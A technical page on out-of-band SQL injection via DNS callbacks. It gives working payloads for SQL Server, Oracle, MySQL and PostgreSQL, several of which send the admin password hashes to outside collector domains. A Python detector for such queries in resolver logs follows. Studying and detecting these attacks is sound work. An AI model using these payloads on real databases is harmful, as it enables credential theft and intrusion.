DNSLog in SQL injection: out-of-band DNS callbacks from various databases

Supported database types

  • SQL Server
  • MySQL
  • Oracle
  • PostgreSQL

Injection techniques

Every payload below follows the same pattern: the query result is concatenated into a hostname under a domain whose DNS logs the attacker controls, and the database is made to resolve that hostname, so the value appears in the DNS log even when the injection itself returns nothing.

SQL Server

Example:

    DECLARE @host varchar(1024);
    SELECT @host = (SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)
                    FROM sys.sql_logins WHERE name = 'sa') + '.s.livesina.com';
    EXEC('master..xp_dirtree "\\' + @host + '\foobar$"');

Oracle

Example1:

    SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');

Example2:

    SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example3:

    SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;

Example4:

    SELECT DBMS_LDAP.INIT('test.s.livesina.com',80) FROM DUAL;

Example5:

    SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;

MySQL

Example:

    SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));

    SELECT * FROM test WHERE id=1 AND 1=2 UNION SELECT 1,LOAD_FILE(CONCAT('\\\\',(SELECT DATABASE()),'.mysql.ip.port.qlsmyg.ceye.io\\abc'));
    SELECT * FROM test WHERE id=1 AND 1=(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT VERSION()),'.mysql.ip.port.qlsmyg.ceye.io\\abc')));

PostgreSQL

Example:

    DROP TABLE IF EXISTS table_output;
    CREATE TABLE table_output(content text);
    CREATE OR REPLACE FUNCTION temp_function()
    RETURNS VOID AS $$
    DECLARE exec_cmd TEXT;
    DECLARE query_result TEXT;
    BEGIN
      SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
      exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
      EXECUTE exec_cmd;
    END;
    $$ LANGUAGE plpgsql SECURITY DEFINER;
    SELECT temp_function();
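All of the payloads above leave the same footprint on the defender's side: a database host issuing DNS queries whose leftmost labels carry a hex password hash, a version string or a database name, under a collector domain. The following detector is an added example written for this page (not code from the original post) that scans resolver query logs for that footprint. The log line format ("timestamp client qname qtype"), the watchlist of collector suffixes (taken from the domains used in the payloads) and the sample log lines are all constructed assumptions.

```python
"""Flag DNS queries that look like database out-of-band exfiltration.

Three signals are combined, each mirroring a payload pattern above:
  * oob-suffix         - query ends in a known collector domain
  * hex-digest-label   - a label looks like fn_varbintohexstr() / pg_shadow output
  * high-entropy-label - a long, high-entropy label (encoded data) in any domain
"""
import math
import re
from collections import Counter

# Constructed resolver log; format "timestamp client qname qtype" is an assumption.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z 10.0.0.12 www.example.com A
2024-03-01T10:00:02Z 10.0.0.12 0x0200f1a9b7c44d0e3a8c55e2b9d07f6c1e4a3b8d2f9c0e7a6b5d4c3f2e1a0b9c.s.livesina.com A
2024-03-01T10:00:03Z 10.0.0.33 mail.example.org MX
2024-03-01T10:00:04Z 10.0.0.12 5.7.33-0ubuntu0.18.04.1.mysql.ip.port.qlsmyg.ceye.io A
2024-03-01T10:00:05Z 10.0.0.40 md5d41d8cd98f00b204e9800998ecf8427e.s.livesina.com A
2024-03-01T10:00:06Z 10.0.0.12 cdn.static-assets.example.net AAAA
"""

# Assumed watchlist: the collector domains that appear in the page's payloads.
OOB_SUFFIXES = (".livesina.com", ".ceye.io")

# Hex digest with the optional prefixes seen in SQL Server ("0x...") and
# PostgreSQL pg_shadow ("md5...") password hashes.
HEX_LABEL = re.compile(r"^(?:0x|md5)?[0-9a-f]{32,}$", re.IGNORECASE)

MIN_LABEL_LEN = 20      # labels shorter than this are never judged on entropy
ENTROPY_THRESHOLD = 3.5 # bits per character; hex/base32 data sits near 4-5


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def classify_qname(qname: str, suffixes=OOB_SUFFIXES) -> list:
    """Return the list of reasons a query name is suspicious (empty if benign)."""
    reasons = []
    name = qname.rstrip(".").lower()
    if name.endswith(suffixes):
        reasons.append("oob-suffix")
    labels = name.split(".")
    if any(HEX_LABEL.match(label) for label in labels):
        reasons.append("hex-digest-label")
    longest = max(labels, key=len)
    if len(longest) >= MIN_LABEL_LEN and shannon_entropy(longest) >= ENTROPY_THRESHOLD:
        reasons.append("high-entropy-label")
    return reasons


def scan_log(text: str) -> list:
    """Parse log lines and return one dict per suspicious query, in log order."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines rather than crash on them
        ts, client, qname, qtype = parts[:4]
        reasons = classify_qname(qname)
        if reasons:
            hits.append({"time": ts, "client": client, "qname": qname,
                         "qtype": qtype, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['qname']} -> {', '.join(hit['reasons'])}")
```

In the sample log, the SQL Server hash, the MySQL version string and the pg_shadow hash are the only three lines flagged; the suffix watchlist catches the version string even though it is short and low-entropy, while the hex and entropy checks still fire when an attacker uses a collector domain that is not on the list. In production the strongest correlation is the client address: a database server that normally makes no DNS queries at all, suddenly resolving long names, is the event worth alerting on regardless of the domain.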